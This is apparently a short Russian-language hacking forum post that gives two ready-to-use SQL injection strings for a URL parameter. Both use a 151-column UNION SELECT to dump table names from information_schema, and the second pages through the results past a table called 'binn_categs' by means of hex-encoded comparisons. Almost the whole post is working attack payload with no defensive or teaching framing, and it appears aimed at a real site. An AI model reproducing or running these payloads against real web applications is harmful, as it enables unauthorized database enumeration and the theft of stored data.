Выводим таблицы с начала:
Code:
2-1+UNION+SELECT+1,2,3,4,group_concat(table_name),6, 7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24 ,25,26,27,28,29,30,31,32,33,34,35,36,37,38,39,40,4 1,42,43,44,45,46,47,48,49,50,51,52,53,54,55,56,57, 58,59,60,61,62,63,64,65,66,67,68,69,70,71,72,73,74 ,75,76,77,78,79,80,81,82,83,84,85,86,87,88,89,90,9 1,92,93,94,95,96,97,98,99,100,101,102,103,104,105, 106,107,108,109,110,111,112,113,114,115,116,117,11 8,119,120,121,122,123,124,125,126,127,128,129,130, 131,132,133,134,135,136,137,138,139,140,141,142,14 3,144,145,146,147,148,149,150,151+from+information _schema.tables+where+table_schema!=0x696E666F726D6 174696F6E5F736368656D61+--+
Выводим таблицы после binn_categs:
Code:
2-1+UNION+SELECT+1,2,3,4,group_concat(table_name),6, 7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24 ,25,26,27,28,29,30,31,32,33,34,35,36,37,38,39,40,4 1,42,43,44,45,46,47,48,49,50,51,52,53,54,55,56,57, 58,59,60,61,62,63,64,65,66,67,68,69,70,71,72,73,74 ,75,76,77,78,79,80,81,82,83,84,85,86,87,88,89,90,9 1,92,93,94,95,96,97,98,99,100,101,102,103,104,105, 106,107,108,109,110,111,112,113,114,115,116,117,11 8,119,120,121,122,123,124,125,126,127,128,129,130, 131,132,133,134,135,136,137,138,139,140,141,142,14 3,144,145,146,147,148,149,150,151+from+information _schema.tables+where+table_schema!=0x696E666F726D6 174696F6E5F736368656D61+and+table_name>0x62696E6E5F636174656773+--+
vBulletin® v3.8.14, Copyright ©2000-2026, vBulletin Solutions, Inc. Перевод: zCarot